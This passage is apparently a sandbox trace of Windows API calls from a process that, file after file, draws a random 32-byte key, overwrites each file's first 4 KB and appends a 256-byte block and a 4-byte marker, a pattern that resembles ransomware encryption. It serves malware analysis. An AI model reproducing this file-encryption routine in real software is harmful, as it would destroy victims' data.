0x7d6a5b8 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.057] GetProcessHeap () returned 0x280000 [0080.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0080.057] GetProcessHeap () returned 0x280000 [0080.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.058] GetProcessHeap () returned 0x280000 [0080.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0080.058] GetProcessHeap () returned 0x280000 [0080.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0080.058] GetProcessHeap () returned 0x280000 [0080.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0080.058] GetProcessHeap () returned 0x280000 [0080.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0080.058] SetFilePointerEx (in: hFile=0x874, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.058] WriteFile (in: hFile=0x874, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.058] WriteFile (in: hFile=0x874, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.058] GetProcessHeap () returned 0x280000 [0080.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0080.058] GetProcessHeap () returned 0x280000 [0080.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0080.058] GetProcessHeap () returned 0x280000 [0080.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0080.058] CloseHandle (hObject=0x874) returned 1 [0080.312] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 58 [0080.312] SetFilePointerEx (in: hFile=0x878, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.312] ReadFile (in: hFile=0x878, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.312] SetFilePointerEx (in: hFile=0x878, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.312] GetProcessHeap () returned 0x280000 [0080.312] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0080.312] GetProcessHeap () returned 0x280000 [0080.312] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0080.312] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0080.312] GetProcessHeap () returned 0x280000 [0080.313] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0080.313] ReadFile (in: hFile=0x878, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.389] SetFilePointerEx (in: hFile=0x878, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.389] WriteFile (in: hFile=0x878, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.389] GetProcessHeap () returned 0x280000 [0080.389] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0080.389] GetProcessHeap () returned 0x280000 [0080.389] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0080.389] GetProcessHeap () returned 0x280000 [0080.389] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0080.389] GetProcessHeap () returned 0x280000 [0080.389] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0080.389] GetProcessHeap () returned 0x280000 [0080.389] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0080.389] GetProcessHeap () returned 0x280000 [0080.389] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0080.389] GetProcessHeap () returned 0x280000 [0080.389] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.390] GetProcessHeap () returned 0x280000 [0080.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.390] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0080.391] GetProcessHeap () returned 0x280000 [0080.391] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.392] GetProcessHeap () returned 0x280000 [0080.392] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.393] GetProcessHeap () returned 0x280000 [0080.393] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0080.393] GetProcessHeap () returned 0x280000 [0080.394] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0080.394] GetProcessHeap () returned 0x280000 [0080.394] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0080.394] GetProcessHeap () returned 0x280000 [0080.394] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0080.394] SetFilePointerEx (in: hFile=0x878, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.394] WriteFile (in: hFile=0x878, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.394] WriteFile (in: hFile=0x878, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.394] GetProcessHeap () returned 0x280000 [0080.394] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0080.394] GetProcessHeap () returned 0x280000 [0080.394] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0080.394] GetProcessHeap () returned 0x280000 [0080.394] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0080.394] CloseHandle (hObject=0x878) returned 1 [0080.395] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 59 [0080.395] SetFilePointerEx (in: hFile=0x87c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.395] ReadFile (in: hFile=0x87c, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.395] SetFilePointerEx (in: hFile=0x87c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.396] GetProcessHeap () returned 0x280000 [0080.396] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0080.396] GetProcessHeap () returned 0x280000 [0080.396] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0080.396] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0080.396] GetProcessHeap () returned 0x280000 [0080.396] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0080.396] ReadFile (in: hFile=0x87c, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.459] SetFilePointerEx (in: hFile=0x87c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.460] WriteFile (in: hFile=0x87c, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.460] GetProcessHeap () returned 0x280000 [0080.460] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.460] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] 